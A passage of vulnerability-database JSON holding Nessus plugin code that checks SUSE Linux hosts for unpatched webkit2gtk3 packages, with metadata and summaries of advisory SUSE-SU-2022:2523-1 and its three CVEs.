{'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15', 'sles-ltss-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1', 'sles-ltss-release-15.1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libwebkit2gtk-4_0-37 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T08:43:42", "description": "The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:2523-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-23T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2523-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2023-07-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_1-0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-5_0-0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_1-0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-5_0-0", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_1", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-5_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_1", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-5_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_1", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_1-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-5_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "p-cpe:/a:novell:suse_linux:webkit2gtk3-soup2-devel", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18"], "id": "SUSE_SU-2022-2523-1.NASL", "href": "https://www.tenable.com/plugins/nessus/163421", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:2523-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163421);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/13\");\n\n script_cve_id(\"CVE-2022-22662\", \"CVE-2022-22677\", \"CVE-2022-26710\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:2523-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2523-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by\nmultiple vulnerabilities as referenced in the SUSE-SU-2022:2523-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue\n is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be\n interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1201221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-26710\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-July/011628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70ebb093\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22662\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26710\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-5_0-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-5_0-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-5_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-5_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_1-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-5_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-soup2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 